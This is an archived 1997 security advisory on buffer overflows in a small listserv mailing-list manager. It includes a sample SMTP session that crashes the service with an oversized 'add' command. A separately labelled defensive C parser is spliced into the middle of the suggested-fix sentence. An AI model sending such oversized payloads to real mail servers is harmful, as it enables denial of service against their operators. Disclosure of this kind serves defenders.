
Buffer overflows in the listserv mailing list manager.

Description: Standard buffer overflow stuff, although this may not be exploitable.
Compromise: Possibly just a DOS attack, unless you can make an exploit out of it.
Vulnerable Systems: Systems running unpatched versions of listserv.
Date: 19 June 1997
Notes: This is NOT the L-Soft "listserv" program, instead it is a significantly less popular (and less powerful) listserv program available on sunsite.

Date: Sat, 1 Jan 1994 17:50:59 +0100

listserv buffer overflow(s)

             plaguez security advisory no. 4

               listserv buffer overflow(s)

Hello all,

[forget it if it's known stuff :), however, the archives
from sunsite still have this hole.]

I have found several buffer overflows in listserv,
a widely used mailing-list management program.

By exploiting those vulnerabilities, malicious hackers can
remotely execute arbitrary commands on the target machine:
typically, place backdoors on the system or remove users'
mail files, as listserv needs to run sgid 'mail'.

However, the impact is harmless because it is almost
impossible to predict the parameters to use for the
actual overflow, i.e. stack prediction and buffer size.
This hole is still annoying because it can provide an
efficient DOS attack: the attacker would repeatedly
connect to the target host and send an oversized buffer,
resulting in many segfaults on the target system.

Technical stuff:
User commands are sent directly through the body of the
message, where users can write whatever they want.
Potential buffer overflows are located in the functions
that handle those commands. ( main() bof are mostly
 +file subscribe.c,

   function subscription(char *from, char *command, int add,
                         int outsider)
   { char tmp[256], grp[256], adr[256];
      command is there a user command that hasn't been
      modified. An overflow may occur there.

Sample exploit:

$ telnet xxxxxx.xxx 25

Connected to
Escape character is '^]'.
220 xxxxxx.xxx ESMTP Sendmail 8.8.5/8.8.2; Fri, 20 Jun 1997 08:54:52 -0400
MAIL FROM: oooops@oooops.org
250 ooops ... Sender ok
RCPT TO: Listserv
250 Listserv ... Recipient ok
254 Enter mail, end with "." on a line by itself
From: noone

add aaaaaaaaaaaaaaa[...lotsa chars go here]aaaaaaaaaaaaa aaaaaa aaaaaa
250 RAFZ04965 Message accepted for delivery
221 xxxxxxx.xxx closing connection

The listserv handling this session will bof and then crash.

Sorry I'm too lazy to make a fix... A possible one would be
to use dynamic length strings, or (easier to implement)
strip each command down to its 200 first characters for

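As an added example (not code from the advisory or from the listserv program), a bounded parser for the "add" command that implements the fix suggested above: commands longer than 200 characters are rejected before anything is copied, and every copy into the 256-byte buffers is length-checked. The buffer names follow grp/adr in subscription(); the "add <group> <address>" syntax is assumed from the sample session.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ    256   /* size of tmp/grp/adr in subscription() */
#define CMD_LIMIT 200   /* cap on a user command, as the advisory suggests */

/* Copy n bytes of src into dst[dst_sz], always NUL-terminating and never
 * writing past the end. Returns 0 on success, -1 if src was truncated. */
static int bounded_copy(char *dst, size_t dst_sz, const char *src, size_t n)
{
    int truncated = 0;
    if (n >= dst_sz) { n = dst_sz - 1; truncated = 1; }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated ? -1 : 0;
}

/* Parse "add <group> <address>" from one raw mail-body line into
 * fixed-size grp/adr buffers of BUF_SZ bytes each.
 * Returns 0 on success, -1 if the line is oversized or malformed. */
int parse_subscribe_command(const char *command, char *grp, char *adr)
{
    const char *p, *q;
    if (strlen(command) > CMD_LIMIT) return -1;   /* oversized: refuse early */
    if (strncmp(command, "add ", 4) != 0) return -1;
    p = command + 4;
    while (*p == ' ') p++;                        /* group token */
    q = p;
    while (*q && *q != ' ') q++;
    if (q == p) return -1;
    if (bounded_copy(grp, BUF_SZ, p, (size_t)(q - p)) != 0) return -1;
    while (*q == ' ') q++;                        /* address token */
    p = q;
    while (*q && *q != ' ') q++;
    if (q == p) return -1;
    if (bounded_copy(adr, BUF_SZ, p, (size_t)(q - p)) != 0) return -1;
    return 0;
}

int main(void)
{
    char grp[BUF_SZ], adr[BUF_SZ], big[400];
    /* constructed oversized line, shaped like the one in the sample session */
    memset(big, 'a', sizeof big - 1); big[sizeof big - 1] = '\0';
    memcpy(big, "add ", 4);
    printf("normal: %d\n", parse_subscribe_command("add mylist user@example.org", grp, adr));
    printf("oversized: %d\n", parse_subscribe_command(big, grp, adr));
    return 0;
}
```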
that's all for this time,


   plaguez / libpcap
ln -sf  flames /dev/null


This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources:
